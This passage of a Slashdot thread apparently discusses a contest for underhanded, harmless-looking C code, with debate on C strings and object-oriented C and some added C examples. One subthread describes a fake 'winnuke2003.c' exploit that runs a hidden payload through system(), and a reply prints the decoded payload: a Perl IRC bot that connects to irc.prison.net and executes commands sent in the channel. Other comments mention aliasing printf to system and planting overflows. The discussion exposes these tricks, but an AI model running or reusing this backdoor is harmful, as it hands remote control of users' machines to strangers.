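   handed s->data. memchr is bounded by s->length, so it never overreads. */
size_t c_view_len(const my_string *s)
{
    const char *nul = memchr(s->data, '\0', s->length);
    return nul ? (size_t)(nul - s->data) : s->length;
}

/* Check to run before passing the bytes to any API that stops at NUL:
   a mismatch means the two views of the string disagree. */
int has_embedded_nul(const my_string *s)
{
    return c_view_len(s) != s->length;
}

int main(void)
{
    /* Constructed sample: 7 bytes with a NUL in the middle. */
    my_string *a = init_string("abc\0def", 7);
    my_string *b = init_string("gh", 2);
    if (a == NULL || b == NULL)
        return 1;

    printf("counted=%u c_view=%zu embedded_nul=%d\n",
           (unsigned)string_len(a), c_view_len(a), has_embedded_nul(a));

    if (string_cat(a, b) != NULL)
        printf("after cat: counted=%u\n", (unsigned)string_len(a));

    free_string(a);
    free_string(b);
    return 0;
}
```
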
    19. Re:You're just not used to it. by dcam · · Score: 1

      That is no class. Yeah you can hack together some C that looks kind of like a class, but that is no class. I've written some C like that also.

      What you have requires that I "behave". There is no information hiding. It requires that I call only the functions you provide to manipulate the string.

      Sure that is a better way to write C, but it is not OO programming and that is not a class.

      --
      meh
    20. Re:You're just not used to it. by swillden · · Score: 1

      What you have requires that I "behave".

      The same is true of C++ code. It's always possible to do whatever you want to a given C++ object. The only difference is that in C++ it has to be somewhat more "intentional".

      It requires that I call only the functions you provide to manipulate the string.

      Likewise with C++. You can always manipulate the structure directly. If nothing else, there's always reinterpret_cast<>.

      Sure that is a better way to write C, but it is not OO programming and that is not a class.

      What is OO? That's actually a non-trivial question. Proponents of "pure" OO languages would argue that C++ isn't OO, either, since primitives and classes are not objects. If you take the OO-in-C constructs to their logical limit, you get polymorphism, a sort of inheritance, and can even implement just as much data hiding as C++ does.

      Of course, I'd rather write it in C++, because the compiler takes care of so much bookkeeping. Plus C++ has a number of features that are quite difficult to implement cleanly in C, like exceptions, and I'm a huge fan of the very powerful static polymorphism provided by templates. After 15 years of writing C++, C feels... constraining.

      But you certainly can implement OO designs in C, and the result can be as clean and elegant as anything in C++. As I said, read the Linux source for some excellent examples.

      --
      Note to ACs: I usually delete AC replies without reading them. If you want to talk to me, log in.
    21. Re:You're just not used to it. by dcam · · Score: 1

      The same is true of C++ code. It's always possible to do whatever you want to a given C++ object. The only difference is that in C++ it has to be somewhat more "intentional".

      This is more a question of degree. In C++, you can't do this without touching the source. What I mean is that if I hand you a class to use, unless you edit the code I have given you, you are limited to using the tools I have written and provide. In C there aren't the same constraints.

      Likewise with C++. You can always manipulate the structure directly. If nothing else, there's always reinterpret_cast<>.

      Once again, a question of degree.

      What is OO? That's actually a non-trivial question. Proponents of "pure" OO languages would argue that C++ isn't OO, either, since primitives and classes are not objects. If you take the OO-in-C constructs to their logical limit, you get polymorphism, a sort of inheritance, and can even implement just as much data hiding as C++ does.

      I do realise that. However I think that it is an accurate generalisation to call C++ an OO language and C a language that is not OO.

      Plus C++ has a number of features that are quite difficult to implement cleanly in C, like exceptions, and I'm a huge fan of the very powerful static polymorphism provided by templates

      Agreed. C++ remains my favourite language. At the moment I am coding mostly in C# and I particularly miss templates. That and not being able to assign const members as part of the constructor. Oh and not having header files. Well designed headers are excellent documentation.

      But you certainly can implement OO designs in C, and the result can be as clean and elegant as anything in C++. As I said, read the Linux source for some excellent examples.

      It doesn't quite feel right. Sure it can be made to do it but it isn't what it is really designed to do.

      It just does not feel (to me) clean or elegant, in the same way that that same code implemented in C++ might feel.

      --
      meh
    22. Re:You're just not used to it. by Anonymous Coward · · Score: 0

      You are wrong. You are probably thinking about things like protected and private, but they only function as a help to avoid doing stupid things. Nothing prevents you from working around them, and editing the header file isn't necessary.

      Unless you have a runtime (like Java or .NET) or do some MMU tricks to make them really protected, nothing is going to prevent me from changing every private variable inside your class with a pointer and the correct offset.

      Doing it deliberately is no harder than doing the same thing in C. Doing it on accident is a bit harder, since you don't just assign cl.privatevar.

      But not much harder, since there's always the possibility of using the wrong offset for a pointer.

    23. Re:You're just not used to it. by swillden · · Score: 1

      This is more a question of degree.

      Precisely. There's no sharp line between languages that provide OO features and those that do not. In fact, you can implement OO designs in just about any language that provides function pointers.

      In C++, you can't do this without touching the source.

      Yes, I can. If I know what the internal structure is, I can get at it without modifying the code that defines it. Certainly if you use the "pimpl" pattern, and only provide me with binaries for the implementation, then I'd have a very hard time discovering the structure so as to be able to muck with it, but the pimpl pattern can be implemented in C also.

      However I think that it is an accurate generalisation to call C++ an OO language and C a language that is not OO.

      I agree with that generalization. But the post I originally responded to claimed that you can't create a string class in C, which is a completely different statement. C is not an OO language, but you can implement OO concepts in C, including polymorphism which is the core feature of OOD/P.

      The discussion at hand was about whether or not C is expressive enough, and the complaint was that C-style strings are painful to use. My point is that C provides you enough flexibility to create strings that work in whatever way you'd like them to work, up to and including a string class that completely hides its implementation structure, provides reference-counting and copy-on-write, has polymorphic variants for strings with different growth characteristics or usage patterns (e.g. ropes), etc. And all of that can be done in a way which is only slightly more cumbersome to use than similar classes in C++.

      --
      Note to ACs: I usually delete AC replies without reading them. If you want to talk to me, log in.
    24. Re:You're just not used to it. by Fujisawa+Sensei · · Score: 1
      Honestly, I'm not sure you understand the importance in an OS of interfacing with the hardware. This isn't a job you want to pawn off on the compiler with a bunch of canned, one-size-fits-all libraries. Not unless you want a crappy, slow, awkward OS.

      Like the Amiga OS? IIRC it was written using SAS C++. ;-)

      --
      If someone is passing you on the right, you are an asshole for driving in the wrong lane.
    25. Re:You're just not used to it. by dcam · · Score: 1
      The discussion at hand was about whether or not C is expressive enough, and the complaint was that C-style strings are painful to use. My point is that C provides you enough flexibility to create strings that work in whatever way you'd like them to work, up to and including a string class that completely hides its implementation structure, provides reference-counting and copy-on-write, has polymorphic variants for strings with different growth characteristics or usage patterns (e.g. ropes), etc. And all of that can be done in a way which is only slightly more cumbersome to use than similar classes in C++.

      I'd call it more than "slightly more cumbersome". I'd call it painful. I think that this just comes down to a difference of opinion. I think that it is painful to have to create structures of this sort and use them. I feel that doing this is using a pair of pliers to hammer in a nail. I guess you don't.

      Oh and the other thing that bugs me about C# is that all expressions in a conditional expression are evaluated, rather than exiting as soon as the answer is known. This just results in code bloat. eg:

      if (Var != null)
      {
          if (Var.ToString().Length != 0)
          {
              // ....
          }
      }
      --
      meh
    26. Re:You're just not used to it. by swillden · · Score: 1

      I'd call it more than "slightly more cumbersome". I'd call it painful.

      If you actually do it for a while you'll find that, in fact, it's not that bad. The worst part about it, IME, is that it encourages you to use shorter variable names because method invocations usually have to reference the object name twice, like:

      object->an_operation(object, param1, param2);

      Outside of that, the code looks a little different, but not all that much:

      Object* object = build_object();
      object->do_something(object);
      object->do_something_else(object);
      object->destructor(object);

      Much of Linux uses a slightly different style where rather than putting function pointers directly in the object, they use an "ops" pointer that points to a structure full of function pointers. That makes the code look like:

      object->ops->do_something(object);

      It has the advantage of wasting less space because you can use one ops structure for a whole bunch of objects, and because it allows sets of functionality to be treated as blocks. It's really kind of cool in one way... unlike the normal C++ approach to methods, this allows you to dynamically redefine the behavior of an object, just by changing the ops pointer. You can do the same in C++, of course, but this structure naturally leads you toward the idea whereas C++ does not.

      Really, it's not that bad to work with. In one way it's really nice, actually, in that nothing is hidden. In some cases that makes the code easier to think about.

      Oh and the other thing that bugs me about C# is that all expressions in a conditional expression are evaluated, rather than exiting as soon as the answer is known.

      No short circuit evaluation? That does suck. I can see how someone might think it simplifies the language for dumb programmers, but real programmers have to hate it.

      --
      Note to ACs: I usually delete AC replies without reading them. If you want to talk to me, log in.
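An added example, not part of the thread: the `object->ops->do_something(object)` style described in the comment above, with one shared ops table per behaviour and a close operation that swaps the ops pointer so later writes are refused. The `sink` type, its function names and the 32-byte buffer are hypothetical, chosen only for this illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

struct sink;

/* One table of function pointers per behaviour, shared by every object
   that currently has that behaviour. */
struct sink_ops {
    int  (*write)(struct sink *s, const char *buf, size_t n);
    void (*close)(struct sink *s);
};

struct sink {
    const struct sink_ops *ops;   /* one pointer per object, not one per method */
    char   buf[32];
    size_t used;
};

/* Behaviour while open: bounded append into the fixed buffer. */
static int open_write(struct sink *s, const char *buf, size_t n)
{
    if (n > sizeof s->buf - s->used)   /* refuse rather than overflow */
        return -1;
    memcpy(s->buf + s->used, buf, n);
    s->used += n;
    return (int)n;
}

/* Behaviour once closed: every write is refused, close is a no-op. */
static int closed_write(struct sink *s, const char *buf, size_t n)
{
    (void)s; (void)buf; (void)n;
    return -1;
}

static void closed_close(struct sink *s) { (void)s; }

/* const tables: the function pointers themselves cannot be overwritten
   through these objects; only the per-object ops pointer changes. */
static const struct sink_ops closed_ops = { closed_write, closed_close };

/* Closing redefines the object's behaviour by swapping its ops pointer. */
static void open_close(struct sink *s)
{
    s->ops = &closed_ops;
}

static const struct sink_ops open_ops = { open_write, open_close };

/* The manually called "constructor". */
void sink_init(struct sink *s)
{
    s->ops = &open_ops;
    s->used = 0;
}

int sink_is_open(const struct sink *s)
{
    return s->ops == &open_ops;
}

int main(void)
{
    struct sink a, b;
    sink_init(&a);
    sink_init(&b);

    printf("shared ops table: %d\n", a.ops == b.ops);
    printf("write while open: %d\n", a.ops->write(&a, "hello", 5));

    a.ops->close(&a);                 /* a now points at closed_ops */
    printf("write after close: %d\n", a.ops->write(&a, "x", 1));
    printf("b still open: %d\n", sink_is_open(&b));
    return 0;
}
```
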
    27. Re:You're just not used to it. by dcam · · Score: 1

      Really, it's not that bad to work with. In one way it's really nice, actually, in that nothing is hidden. In some cases that makes the code easier to think about.

      I think you might be right. It is possible with more experience that this might feel rather more natural.

      No short circuit evaluation? That does suck. I can see how someone might think it simplifies the language for dumb programmers, but real programmers have to hate.

      Big time. Very annoying. C# also has a tendency to be overly verbose, in a way that does not improve clarity. Short circuit evaluation is one of those areas. You also tend to end up with long statements:
      SomeVar.SomeProp.SomeFunc()

      This is exacerbated by the fact that everything is class based. So you never have a plain constant, everything is class based. So to get a NULL value, you need:
      DBNull.Value

      Or for a carriage return:
      Environment.NewLine
      (as opposed to vbcrlf in vb)

      The other area where this is annoying is the lack of templates (which I mentioned before). Suppose you have a widget class. You want to store a collection of widgets (polymorphic, whatever), and you want to be able to add and remove items at will. Now you have two options, both relatively unsavoury.

      1. Use an arraylist, which stores everything as an object, and so things must be cast back to their appropriate types when you pull them out. This is, in some ways, an accident waiting to happen because you don't know what is actually there, and need to handle the fact that, by mistake, an instance of a class other than widget was pushed in.

      2. Extend one of the collection classes. I think that this is the recommended way. What is screwed about this is that you end up writing the same code again and again. Errors increase, and it is a waste of time. It does not increase clarity, and a slightly non-standard implementation of this might slip right under the radar. Microsoft: code duplication is bad mmkay?

      I just don't think that 2 is a sustainable option, so I run with 1. What I really want are vectors, maps and the like.

      Aside from that it is a pretty neat language. But I have to say, C++ is still my favourite language, particularly when you include the STL. It is just a pity I don't get paid to write it and I don't have the time to write it for recreation. I was working on an app that allowed you to do boolean searches of a collection of files. I haven't touched it in a couple of years though :-(. Sitting at 1000 lines last time I touched it. This was before the release of the Google and MSN desktop search tools.

      --
      meh
    28. Re:You're just not used to it. by dcam · · Score: 1

      Actually I'll have to take that back about short circuit evaluation. I'm not sure where I got the idea that it couldn't. I think I wrote some code assuming that it could and got exceptions thrown. I'll have to dig further to find out under what conditions this occurs or if I just made a mistake and attributed it to the wrong source.

      --
      meh
    29. Re:You're just not used to it. by swillden · · Score: 1

      But I have to say, C++ is still my favourite language, particularly when you include the STL.

      Me, too. Of late I mostly write Java, when I'm not using a word processor, but every time I get to write C++ I find myself thinking "Damn! This is really nice!". I almost never recommend C++ when planning a project, though, because there aren't enough people around who know it and the learning curve is too steep to realistically expect people to pick it up on the fly while still being effective. So mostly I only write C++ on one-man projects that I won't have to turn over to someone else for maintenance.

      BTW, your comment about how C# does do short-circuit evaluation led me to Google it, and it appears to me that you get to pick. If you use '&' or '|' then it always evaluates the full expression, but if you use '&&' or '||' (the Conditional Logical Operators) then it short circuits. I'm not sure there's a value in distinguishing, and it seems to me that it could lead to hard-to-see bugs where the programmer should have used '&&' but used '&' or vice versa. I'd probably enforce a stylistic rule that '&' was to be used only for bitwise operations unless a comment was added to point out the non short-circuit usage.

      --
      Note to ACs: I usually delete AC replies without reading them. If you want to talk to me, log in.
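The '&' versus '&&' mix-up raised in the comment above, carried over to C as an added example that is not from the thread. In C, '&' on ints is bitwise, so besides always evaluating both operands it can also change the result; the access-check functions, flag value and token are hypothetical.

```c
/* Added example; all names and values are hypothetical. */
#include <stdio.h>

#define F_ADMIN 0x4
struct user { int flags; };

static int calls;   /* how many times the right-hand check ran */

/* Returns 1 for the one valid token (constructed value). */
int token_ok(int token) { return token == 1234; }

/* Returns the raw flag bit (4), which is "true" in C but is not 1. */
int is_admin(const struct user *u) { calls++; return u->flags & F_ADMIN; }

/* Reads like a logical AND but is bitwise: 1 & 4 == 0, so a valid admin
 * with a valid token is refused, and is_admin() runs even when the token
 * check has already failed. */
int allow_bitwise(const struct user *u, int token)
{
    return token_ok(token) & is_admin(u);
}

/* Short-circuit form: is_admin() runs only after token_ok() succeeds, and
 * any nonzero result counts as true. */
int allow_logical(const struct user *u, int token)
{
    return token_ok(token) && is_admin(u);
}

int main(void)
{
    struct user admin = { F_ADMIN };
    printf("bitwise: %d, logical: %d\n",
           allow_bitwise(&admin, 1234), allow_logical(&admin, 1234));
    return 0;
}
```

A review rule like the one proposed in the comment (flag every '&' or '|' whose operands are comparisons or function calls) catches both effects.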
    30. Re:You're just not used to it. by ezeri · · Score: 1

      And again you're entirely missing the point. C is not a high level language. It's there when you want full control over every little thing your program is doing. Hand holding is a job for other languages, so when you need hand holding you can go use one of them. Or if you really want to use C and want all the extra string features, write your own library or use one of the many freely available.

      --
      There are 4 boxes to use in the defense of liberty: soap, ballot, jury, ammo. Use in that order. Starting now. - Ed Howd
    31. Re:You're just not used to it. by Dun+Malg · · Score: 1
      Honestly, I'm not sure you understand the importance in an OS of interfacing with the hardware. This isn't a job you want to pawn off on the compiler with a bunch of canned, one-size-fits-all libraries. Not unless you want a crappy, slow, awkward OS.

      Like the Amiga OS? IIRC it was written using SAS C++. ;-)

      Ja, this is true, but one could hardly compare C++ with the ridiculous "build your own OS construction set" language the OP was describing. Programming an OS in C is like building a tractor having only a steel mill as a resource. C++ is like building one having access to a collection of industrial machine parts. The OP's absurd wish-language is like having an assembled tractor that comes in a box and you get to pick the seats, stereo, paint color, and the style of chrome wheels it gets. It's not building an OS, it's skinning one someone else built.

      --
      If a job's not worth doing, it's not worth doing right.
    32. Re:You're just not used to it. by Dun+Malg · · Score: 1
      I disagree...as a career assembly language programmer, it is often more convenient, smaller and faster, to have the length of something available for loading into a register, then loop through the array, auto-decrementing the register as you go, and stop when it hits 0, rather than doing a compare for 0 after each step through the array to see if you're done. Plus, it's kinda nice to be able to have strings with null characters in them...no can do in C.

      You disagree with what? Convenience, size, and speed are issues entirely unrelated to consistent behavior of data types. If you want to encode your C strings to include their own length in the first two bytes, there's nothing stopping you from doing it, just like in assembly. C strings aren't "broken"-- they fit neatly with the rest into the larger scheme of C's data handling. The point is, C treats strings like any other array of data, and if you want more than that you gotta do it your own dang self, or use a different language.

      --
      If a job's not worth doing, it's not worth doing right.
    33. Re:You're just not used to it. by VAXcat · · Score: 1

      Read what I was replying to...the post I replied to stated that "C handles strings the same way assembly does". I'm telling you, assembly programmers don't handle strings the way C does...we want to load a count into a register, and then let the count decrement as the operations get done, rather than do compares for 0 at each step...using the sobgeq or sobgtr instruction after moving each byte, rather than having to beql to exit, or br back to the loop. Saves instructions, and keeps execution "in order". Also, assembly language programmers often like to move blocks of bytes around without worrying if there is a 0 "inband".

      --
      There is no God, and Dirac is his prophet.
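The two string models argued over in this sub-thread (a length in the first two bytes versus a terminating 0) disagree exactly when a 0 byte sits "inband". The following is an added example, not code from any poster; the struct, function names and sample bytes are constructed, and the little-endian length is an assumption.

```c
/* Added example: struct, function names and sample bytes are constructed. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* A counted string: explicit length, bytes may include 0x00. */
struct counted { const unsigned char *data; size_t len; };

/* View a buffer whose first two bytes hold a little-endian length.
 * Returns 0, or -1 if the declared length overruns the buffer. */
int lp_view(const unsigned char *buf, size_t buflen, struct counted *out)
{
    size_t len;
    if (buflen < 2) return -1;
    len = (size_t)buf[0] | ((size_t)buf[1] << 8);
    if (len > buflen - 2) return -1;
    out->data = buf + 2;
    out->len = len;
    return 0;
}

/* What a str*-only consumer sees: comparison stops at the first NUL.
 * Only safe here because the sample buffers end in a terminator. */
int naive_equals(struct counted s, const char *expected)
{
    return strcmp((const char *)s.data, expected) == 0;
}

/* Length-aware comparison: every declared byte takes part. */
int counted_equals(struct counted s, const char *expected)
{
    size_t n = strlen(expected);
    return s.len == n && memcmp(s.data, expected, n) == 0;
}

/* Convert to a C string only when nothing is lost: refuse in-band NULs
 * and strings that do not fit. Returns 0 or -1. */
int to_cstring(struct counted s, char *out, size_t cap)
{
    if (s.len >= cap || memchr(s.data, 0, s.len) != NULL) return -1;
    memcpy(out, s.data, s.len);
    out[s.len] = '\0';
    return 0;
}

/* Constructed samples: length 11 with a NUL in band, and a clean length 5.
 * Each array carries one extra trailing 0 outside the declared length. */
const unsigned char WITH_NUL[] = { 11, 0, 'a','l','i','c','e', 0,
                                   'g','u','e','s','t', 0 };
const unsigned char CLEAN[] = { 5, 0, 'a','l','i','c','e', 0 };

int main(void)
{
    struct counted s;
    char tmp[32];
    lp_view(WITH_NUL, sizeof WITH_NUL, &s);
    printf("naive=%d counted=%d convertible=%d\n", naive_equals(s, "alice"),
           counted_equals(s, "alice"), to_cstring(s, tmp, sizeof tmp) == 0);
    return 0;
}
```

The 11-byte sample compares equal to "alice" through strcmp() but not through the length-aware check, which is the mismatch to test for wherever counted data crosses into str* code.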
  83. MOD PARENT DOWN. by Anonymous Coward · · Score: 0

    this works fine on Linux (mandriva), Solaris, and HP-UX. Somebody already tried it on XP and said that it worked fine.

  84. Open Source by tsotha · · Score: 1
    I've been wondering about this for quite awhile. In fact, it came up just recently when we were considering PasswordSafe at work. Ok, so it's open source and all, so I tell myself "self, it's probably not mailing my passwords back to Bruce Schneier. But being as you're kinda paranoid, maybe you should just get the source, audit it, then build from the audited source. That way you'll know everything's on the up-and-up."

    But then I ask myself "but, self, what if the code is written by someone really clever, I mean somebody who's smart enough to use a buffer overrun or mangled pointer or some such to do it on the sly? Not smart like Einstein, but smart like, oh, Professor Moriarty?"

    I'll be kinda curious if the entrants of this contest can write code that doesn't look like it's doing something sneaky, even if the exact mechanism isn't clear. It has practical implications for the security of open source.

    1. Re:Open Source by nsd20463 · · Score: 1

      Interesting that you bring up passwordsafe. The function that computes the test hash (used to check that the passphrase is correct) does not compute what it appears to compute. However I believe that it was an unintentional error and not deliberate obfuscation. I think the error wasn't caught because one random looking number is as good as another if all you're doing is checking for ==.

      It wasn't until I independently re-implemented the functionality that I discovered it. Because then I had to do what the code really did in order to be compatible.

    2. Re:Open Source by ZorroXXX · · Score: 1
      But then I ask myself "but, self, what if the code is written by someone really clever, I mean somebody who's smart enough to use a buffer overrun or mangled pointer or some such to do it on the sly?

      But even if the source is clean, you still have to trust the compiler. And you cannot actually do that unless you verify the source code of the compiler. But then you of course also have to verify the compiler that was used to compile the first compiler etc. And what about the operating system or processor. Can you really trust them?

      So it boils down to that for some boundary you just have to trust whatever it is depending on.

      --
      When you are sure of something, you probably are wrong (search for "Unskilled and Unaware of It").
  85. Service Pack fixes it, but it's documented by edalytical · · Score: 4, Informative
    --
    Win a signed Stephen Carpenter ESP Guitar from the Deftones: http://def-tag.com/?r=0008781
    1. Re:Service Pack fixes it, but it's documented by Dun+Malg · · Score: 1

      whateverdude. This problem was fixed with XP SP1 three years ago. If you're running pre-SP1 XP, you're already an idiot.

      --
      If a job's not worth doing, it's not worth doing right.
  86. like they can find all the normal bugs?? by Anonymous Coward · · Score: 0

    As long as the people that are looking at the code are the same ones that can find all the "normal" bugs we should have nothing to worry about here.

    If all those eyes can't find blatant stupidity how are they going to find cleverness/true genius??

    They won't.

  87. Thanks for the technocrat pointer by typical · · Score: 1

    Actually, the headlines up there look interesting and more accurate than Slashdot's. I'll give it a try. Thank you.

    --
    Any program relying on (nontrivial) preemptive multithreading will be buggy.
  88. Should I enter with this? by krappie · · Score: 1

    I started hanging out in this script kiddie channel on irc, and I'd always come back to seeing a bunch of messages from people asking for exploits.

    So one day I decided to make something to give them.

    The source can be downloaded here: http://brain.cx/winnuke2003.c

    I didn't even really try... but it caused a huge ruckus when people started mass distributing it. It might not even work anymore.. eh..

    1. Re:Should I enter with this? by Sigma+7 · · Score: 1
      I started hanging out in this script kiddie channel on irc, and I'd always come back to seeing a bunch of messages from people asking for exploits.

      So one day I decided to make something to give them.

      The source can be downloaded here: http://brain.cx/winnuke2003.c


      Something like that would get caught easily. It calls system(), with "chmod +x /tmp/hi 2>/def/null;/tmp/hi".

      I didn't even really try... but it caused a huge ruckus when people started mass distributing it. It might not even work anymore.. eh..


      Probably not, since it uses direct byte-code. I suspect it would only function on one specific platform at a given time.
    2. Re:Should I enter with this? by krappie · · Score: 1

      Something like that would get caught easily. It calls system(), with "chmod +x /tmp/hi 2>/def/null;/tmp/hi".

      You're right, I'm sure it's not as sneaky as some of the submissions we are going to see in the contest. Also, my fake C code is so stupid, I just threw something together that compiled. Only idiots would be fooled by this.

      Probably not, since it uses direct byte-code. I suspect it would only function on one specific platform at a given time.

      Actually you're completely wrong here.. look closer

    3. Re:Should I enter with this? by lachlan76 · · Score: 1
      No it is not a binary, take a look at the code which I just decoded in the last 30 seconds.

      #!/usr/bin/perl
      $chan="#darknet";
      $nick="moron";
      $server="irc.prison.net";;;;
      $SIG{TERM}={};
      ex it if fork;
      use IO::Socket;$sock = IO::Socket::INET->new($server.":6667")||exit;
      pri nt $sock "USER moron +i moron :moronv3\nNICK moron\n";
      $i=1;
      while(<$sock>=~/^[^ ]+ ([^ ]+) /)
      {
      $mode=$1;
      last if $mode=="001";
      if($mode=="433")
      {
      $i++;
      $nick=~ s/\d*$/$i/;
      print $sock "NICK $nick\n";
      }
      }
      print $sock "JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that ran a fake 0day exploit. v2\nPRIVMSG $chan :to run commands on me, type: ".$nick.": command\n";
      while(<$sock>)
      {
      if (/^PING (.*)$/)
      {
      print $sock "PONG $1\nJOIN $chan\n";
      }
      if(s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* (.*)$/$1/)
      {s/\s*$//;$_=`$_`;
      foreach(split "\n")
      {
      print $sock "PRIVMSG $chan :$_\n";
      sleep 1;
      }
      }
      }
      #chmod +x /tmp/hi 2>/dev/null;/tmp/hi
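The exchange above turns on whether the "byte-code" in the fake exploit is machine code or an encoded script, which can be checked before anything is compiled or run. This is an added example, not code from the thread or from winnuke2003.c; it assumes the payload sits in a string literal as `\xNN` escapes, and the function names, the 95% threshold and both sample strings are constructed.

```c
/* Added example: names, threshold and sample strings are constructed. */
#include <ctype.h>
#include <stdio.h>

enum verdict { V_MALFORMED = -1, V_BINARY, V_TEXT, V_SCRIPT };

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* Decode the body of a string literal as it appears in source text:
 * \xNN becomes one byte, everything else is copied unchanged.
 * Returns the byte count, or -1 on a bad escape or a full buffer. */
long decode_literal(const char *src, unsigned char *out, size_t cap)
{
    size_t n = 0;
    while (*src) {
        int b = (unsigned char)*src;
        if (src[0] == '\\' && src[1] == 'x') {
            int hi = hexval((unsigned char)src[2]);
            int lo = hi < 0 ? -1 : hexval((unsigned char)src[3]);
            if (lo < 0) return -1;
            b = hi * 16 + lo;
            src += 4;
        } else {
            src++;
        }
        if (n == cap) return -1;
        out[n++] = (unsigned char)b;
    }
    return (long)n;
}

/* At least 95% printable bytes means text; text starting with "#!" is a
 * script that something (e.g. a system() call) could run directly. */
enum verdict classify(const unsigned char *buf, size_t len)
{
    size_t printable = 0;
    for (size_t i = 0; i < len; i++)
        if (isprint(buf[i]) || isspace(buf[i])) printable++;
    if (len == 0 || printable * 100 < len * 95) return V_BINARY;
    return (len >= 2 && buf[0] == '#' && buf[1] == '!') ? V_SCRIPT : V_TEXT;
}

enum verdict triage(const char *literal)
{
    unsigned char buf[4096];
    long n = decode_literal(literal, buf, sizeof buf);
    return n < 0 ? V_MALFORMED : classify(buf, (size_t)n);
}

int main(void)
{
    /* Constructed, harmless samples: "#!/bin/sh\necho hi\n" and raw bytes. */
    const char *script = "\\x23\\x21\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x0a"
                         "\\x65\\x63\\x68\\x6f\\x20\\x68\\x69\\x0a";
    const char *blob = "\\x00\\x01\\xfe\\xff\\x80\\x90\\x7f\\x1b";
    printf("script -> %d, blob -> %d\n", triage(script), triage(blob));
    return 0;
}
```

A V_SCRIPT or V_TEXT verdict on something labelled shellcode, next to a system() call, is the combination the two commenters spotted by hand.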
  89. Sadly. IE is not eligible by anno1602 · · Score: 1

    They specifically say the code has to be readable and harmless-looking.

  90. Re:NOT FUNNY: Chinese Hackers by Anonymous Coward · · Score: 0

    I know you are, but what am I?

  91. So weird by Sloppy · · Score: 1
    This kind of thing requires thinking that is so unlike typical programmer thinking. I'm sort of at a loss as to how I would approach this.

    I can think of ways to make some harmless-looking code do harm, but it requires that somewhere else, there be some setup work that causes the harmless code to be harmful. You know, either some preprocessor crap, or function pointer abuse:
    void (*printf)(char*);
    printf=system;
    But the setup would stick out like a sore thumb.

    I'm sure some preprocessor masters and winners of the Obfuscated contest have ways to make that look less malevolent, but the problem with that, is that anytime I see lots of processor funkiness, that alone makes me really suspicious, whether I can figure out what it's doing or not. As an auditor/debugger, the preprocessor scares me. ;-)

    --
    As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
    1. Re:So weird by zallus · · Score: 1

      I really hope you never see a tricky LISP hack.

      --
      I mod down pathetic posts.
    2. Re:So weird by Sancho · · Score: 1

      I would say you'd want to start with creating an intentional buffer overflow. Find a way to hide it so it's not horribly obvious as to what it is, but frankly, from some of the Open Source code you see out there, buffer overflows survive cursory glances at the code.

      The hard part would be getting the malicious code in there, but a simple function that, passed with the correct parameters would do something good, would do something terrible with the wrong parameters. Perhaps deleting all files in a given directory (like /tmp) but with an override to give it another path to delete, which could then be munged on the stack. Code looks fine, but the "error" in it causes it to delete /tmp instead of /home.

      Heck, you can cause a lot of havoc with a simple index error, like starting the count at 1 instead of 0.

  92. I think this is more appropriate by btarval · · Score: 2, Funny
    Almost. All it takes is a one-line change to make this malicious program into what should be the motto of this contest:

    main() { printf("Goodbye World!\n"); }

    --
    The best way to predict the future is to create it. - Peter Drucker.
  93. RealPlayer for the Win! by HeXetic · · Score: 1

    Submit the source code for RealPlayer 7 for the win!

    This obvious joke has been brought to you by the ACME Obvious Joke Corporation, a division of -1 Unfunny entertainment.

    --
    http://www.chmodoplusr.com/
  94. Mod parent up by Anonymous Coward · · Score: 0

    I hear Microsoft are going to enter Longhorn.

    That's the spirit!

    ROFLMAO

  95. What does this do? by Anonymous Coward · · Score: 0
  96. OK, Root Beer for You by billstewart · · Score: 1

    Or Ginger Beer. Or non-alcoholic beers if you drink those.

    --

    Bill Stewart
    New Fast-Compression-only CPR http://preview.tinyurl.com/dy575ks
    1. Re:OK, Root Beer for You by sp3tt · · Score: 0

      Root beer, you do realize that it is horrible from a security point of view? Beer and running as root do not mix!

  97. ROOT beer? by Stephen+Samuel · · Score: 1

    I don't drink beer (I generally don't drink alcohol, except for the occasional celebratory champagne). However, a good A&W root beer would do me fine.
    I'm sure that there are others like me...

    --
    Free Software: Like love, it grows best when given away.
  98. In Redmond... by suitepotato · · Score: 1

    ...the prize seems to be you keep your job and get to work the next project. O.o

    Seems like people have a harder time doing things like this on purpose once a year than doing them by accident on a daily basis.

    --
    If my grammar and spelling are off, I am [distracted/tired/careless] (take your pick)
  99. says it causes access violation by Anonymous Coward · · Score: 0

    It doesn't say it halts the system.

    1. Re:says it causes access violation by dadragon · · Score: 1

      Yes, actually it does. From the link: As a result, Windows stops responding (crashes).

      --
      God save our Queen, and Heaven bless The Maple Leaf Forever!
  100. Vectors by headkase · · Score: 2, Informative

    Any program that was able to do two things would pass: The ability to load remote information into memory and to begin execution of the loaded information.
    A way to automatically find this would be to use an execution tracer that would alert you when the program's point of execution "left" its source code or allowed system APIs.

    --
    Shh.
  101. Comment removed by account_deleted · · Score: 2, Insightful

    Comment removed based on user account deletion

  102. Re:Indeed. This could be a field day for Java and by Justice8096 · · Score: 1

    Actually, Java uses low-level hooks into the host's UI routines. If you find a set of known problems in those routines, you have a malicious Java program.
    And no, I haven't written one. But I have had to avoid those problems in my Java applications.

  103. How's this for underhanded by davidwr · · Score: 1
    / ***
    remove this comment before sending
    This code pretends to be released under the BSD license but is really from the GNU license.
    Make sure Microsoft uses it in the next version of MS-Windows.
    *** /

    // note - get some obscure but useful GNU code and put it here

    --
    Knowledge is how to play a game, intelligence is how to win, wisdom is knowing what game to play.
  104. Volunteer to help out! by real+gumby · · Score: 2, Interesting

    Clearly most of us should be submitting innocuous code to help camouflage the actual malign entries. That will make it harder for the judges to find badness. If you know that all the entries have some badness, then you'll look really hard. If you don't know which ones do, your checking gets worse.

    This would make the test more like the real world too.

  105. Step two by Julian+Morrison · · Score: 1

    ...collect it all into a convenient library, for the use of sneaky b*stards.

    I propose the name "libgood.so"

  106. Obfuscation is never the answer. by Feztaa · · Score: 1

    I'd rather have a widely publicized contest showing many different ways of being sneaky with malicious code, so that those ways are known and can be checked for, than to trust in the ignorance of the malicious that they won't already know these techniques.

